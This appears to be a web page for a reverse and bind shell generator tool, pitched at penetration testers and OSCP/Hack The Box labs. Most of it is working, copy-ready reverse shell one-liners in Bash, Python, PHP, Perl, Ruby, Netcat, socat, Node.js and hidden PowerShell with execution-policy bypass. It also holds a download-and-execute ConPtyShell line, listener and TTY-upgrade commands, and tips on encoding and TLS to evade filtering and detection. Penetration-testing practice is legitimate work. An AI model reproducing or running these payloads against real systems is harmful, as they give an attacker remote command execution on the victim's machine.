Reverse Shell & Bind Shell One-Liner Command Generator (2026)

Generate copy-ready Bash, Python3, PowerShell, Netcat, Socat, PHP, and Nishang reverse shell payloads with automatic URL/Base64 encoding, listener setup, and full PTY stabilization.

Reverse Shell & Bind Shell One-Liner Generator — Interactive Console
Runs locally in your browser • Instant output
1. Start Attacker Listener
$ rlwrap -cAr nc -lvnp 4444
2. Full Interactive TTY Upgrade Cheat Sheet
python3 -c 'import pty; pty.spawn("/bin/bash")' && export TERM=xterm
# Ctrl+Z -> stty raw -echo; fg
Bash TCP (/dev/tcp)Linux
/bin/bash -i >& /dev/tcp/10.10.14.22/4444 0>&1
Bash UDP (/dev/udp)Linux
/bin/bash -i >& /dev/udp/10.10.14.22/4444 0>&1
Python3 PTY SocketPython
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.22",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn("/bin/bash")'
PHP fsockopenPHP
php -r '$sock=fsockopen("10.10.14.22",4444);exec("/bin/bash -i <&3 >&3 2>&3");'
Perl SocketPerl
perl -e 'use Socket;$i="10.10.14.22";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
Ruby TCPSocketRuby
ruby -rsocket -e'spawn("/bin/bash",[:in,:out,:err]=>TCPSocket.new("10.10.14.22",4444))'
Netcat Traditional (-e)Netcat
nc -e /bin/bash 10.10.14.22 4444
Netcat OpenBSD FIFONetcat
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.22 4444 >/tmp/f
PowerShell TCPClientWindows
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$c=New-Object System.Net.Sockets.TCPClient('10.10.14.22',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){;$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$sb=(iex $d 2>&1 | Out-String );$sb2=$sb+'PS '+(pwd).Path+'> ';$sby=([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sby,0,$sby.Length);$s.Flush()};$c.Close()"
PowerShell ConPtyWindows
IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.22 4444
Socat Full PTYLinux
socat TCP4:10.10.14.22:4444 EXEC:/bin/bash,pty,stderr,setsid,sigint,sane
Node.js child_processNode.js
node -e 'const net=require("net"),cp=require("child_process"),sh=cp.spawn("/bin/bash",[]);const c=new net.Socket();c.connect(4444,"10.10.14.22",()=>{c.pipe(sh.stdin);sh.stdout.pipe(c);sh.stderr.pipe(c);});'
Ready
Embed / Cite This Tool (Markdown & HTML)
GitHub / Reddit Markdown Badge[![Reverse Shell & Bind Shell One-Liner Generator](https://img.shields.io/badge/ZerosUniverse-Free_Tool-ff6a00)](https://www.zerosuniverse.com/tools/reverse-shell-command-generator/)
Blog / Documentation HTML Citation<a href="https://www.zerosuniverse.com/tools/reverse-shell-command-generator/">Reverse Shell & Bind Shell One-Liner Generator — ZerosUniverse</a>

2026 Authorized Reverse Shell One-Liner & Interactive PTY Stabilization Table

2026 Verified Reference
Quick Answer & 2026 Technical Summary (reverse shell generator)Updated 2026 Standard

During authorized penetration tests and OSCP/HTB labs, start a listener (`nc -lvnp 4444` or `rlwrap nc -lvnp 4444`), execute a runtime-matched outbound shell payload (Bash `/dev/tcp`, Python3 `pty.spawn`, or OpenBSD `mkfifo`), and immediately upgrade the raw socket to a full interactive TTY so `Ctrl+C`, tab-completion, and `sudo` work cleanly.

PTY Upgrade: python3 -c 'import pty;pty.spawn("/bin/bash")' → Ctrl+Z → stty raw -echo; fg → export TERM=xterm-256color
Listener Command: rlwrap -cAr nc -lvnp 4444
Firewall-Friendly Port: 443 (HTTPS) or 53 (DNS) outbound TCP
TTY Stabilization: stty rows 42 cols 160 && export TERM=xterm
Target RuntimeAuthorized Reverse Shell One-LinerBinary / Socket DependencyOperational Lab Note
Bash Built-in (/dev/tcp)bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'GNU Bash (No external binary)Wrap in bash -c '...' if parent shell is /bin/sh
Netcat OpenBSD (mkfifo Pipe)rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 4444 >/tmp/fnc (Works without -e flag)Most reliable Netcat payload on modern Ubuntu/Debian
Python 3 Socket + Native PTYpython3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.14.5",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'python3 standard librarySpawns a pseudo-terminal immediately upon connect
PHP CLI / Web RCE (fsockopen)php -r '$s=fsockopen("10.10.14.5",4444);exec("/bin/sh -i <&3 >&3 2>&3");'php-cli (FD #3 stream)Use proc_open() if exec/system are in disable_functions
PowerShell TCPClient Stream$c=New-Object Net.Sockets.TCPClient('10.10.14.5',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};...powershell.exe / pwshEncode as UTF-16LE Base64 for powershell -enc
Interactive TTY Upgrade Sequencepython3 -c 'import pty;pty.spawn("/bin/bash")' ; stty raw -echo; fgHost Terminal + Python/ScriptPrevents accidental Ctrl+C from killing your shell
In-Depth ZerosUniverse Tutorial

What is a RAT (Remote Access Trojan) & Reverse Shell Architecture?

Read our complete step-by-step editorial guide, architecture breakdown, and defensive best practices on ZerosUniverse.

Read Full Guide

How to Use Reverse Shell & Bind Shell One-Liner Generator

01

Enter Your Listener IP (LHOST) & Port (LPORT)

Input your authorized attacking interface IP (such as 10.10.14.12 on tun0) and target listener port (e.g., 443 or 4444).

02

Select Target OS, Shell Binary & Payload Type

Filter by Linux, Windows, or Cross-Platform runtimes and pick your preferred shell interpreter (/bin/bash, /bin/sh, cmd.exe, or powershell.exe).

03

Apply Evasion Encoding (Raw, URL, or Base64)

Toggle URL encoding for HTTP query injection or UTF-16LE Base64 encoding to eliminate bad characters (&, |, >, quotes) in command injection sinks.

04

Start Listener, Execute Payload & Stabilize TTY

Run the generated listener command on your host, trigger the one-liner on the lab target, and apply the PTY upgrade snippet for an interactive terminal.

Key Capabilities & Technical Architecture

Multi-Runtime Payload Matrix

Switch seamlessly across Bash (/dev/tcp), Netcat (-e and mkfifo FIFO pipes), Python3 pty, PowerShell TCPClient, PHP exec/fsockopen, Perl, Ruby, and OpenSSL encrypted shells.

Real-Time Base64 & URL Encoding

Automatically encode payloads in UTF-16LE Base64 for PowerShell (-EncodedCommand), standard Base64 for Linux bash -c wrappers, or double URL-encoding for web RCE parameters.

Automated Listener & rlwrap Builder

Generate matching attacker listener syntax for ncat, rlwrap nc -lvnp, socat file:`tty`,raw,echo=0, and pwncat-cs alongside every reverse or bind shell command.

Interactive PTY Shell Stabilization Guide

Copy the exact 3-stage Python pty.spawn, stty raw -echo; fg, and TERM/rows/cols export sequence to upgrade dumb shells into full interactive TTY sessions with Ctrl+C and tab completion.

Practical Use Cases

OSCP, CPTS & Hack The Box Lab Exploitation

Rapidly customize LHOST (tun0 VPN IP) and LPORT across 25+ payload variants when validating Remote Code Execution (RCE) vulnerabilities in lab environments.

Egress Firewall & Living-off-the-Land Testing

Test outbound port filtering (ports 80, 443, 53) and validate EDR detection rules against native OS binaries when traditional Netcat (-e) binaries are absent.

Encrypted TLS Reverse Shell Verification

Construct OpenSSL and Socat TLS-encrypted reverse shells to demonstrate how cleartext IDS/IPS signature inspection can be bypassed without DPI TLS termination.

Frequently Asked Questions (FAQs)

What is the difference between a reverse shell and a bind shell?+

In a reverse shell, the target machine initiates an outbound TCP/UDP connection back to the auditor's listening host (LHOST:LPORT), which commonly bypasses inbound NAT and perimeter firewall rules. In a bind shell, the target opens a listening port locally and waits for the auditor to connect inbound.

Why does Netcat 'nc -e /bin/bash' fail on modern Ubuntu and Debian systems?+

Modern Linux distributions ship with the OpenBSD variant of Netcat (nc.openbsd), which removes the -e and -c command execution flags for security reasons. To achieve a reverse shell with OpenBSD Netcat, use a named pipe (mkfifo /tmp/f; nc LHOST LPORT < /tmp/f | /bin/sh >/tmp/f 2>&1).

How do I upgrade a dumb reverse shell to a full interactive TTY?+

First spawn a pseudo-terminal using python3 -c 'import pty; pty.spawn("/bin/bash")'. Press Ctrl+Z to background the shell, run 'stty raw -echo; fg' on your local terminal so keyboard signals pass through to the remote session, and finally run 'export TERM=xterm-256color' inside the remote shell.

Why must PowerShell -EncodedCommand payloads use UTF-16LE before Base64 encoding?+

Windows PowerShell's -EncodedCommand (-enc) parameter natively expects a Unicode (UTF-16 Little Endian) byte array encoded in Base64. Standard UTF-8 Base64 strings lack the alternating null bytes (0x00) for ASCII characters and will fail to parse in powershell.exe.

Does this reverse shell generator log my IP address or execute network connections?+

No. All command synthesis, URL encoding, and UTF-16LE Base64 transformations run 100% locally in your browser via client-side JavaScript. No LHOST IPs or payloads are transmitted to any server.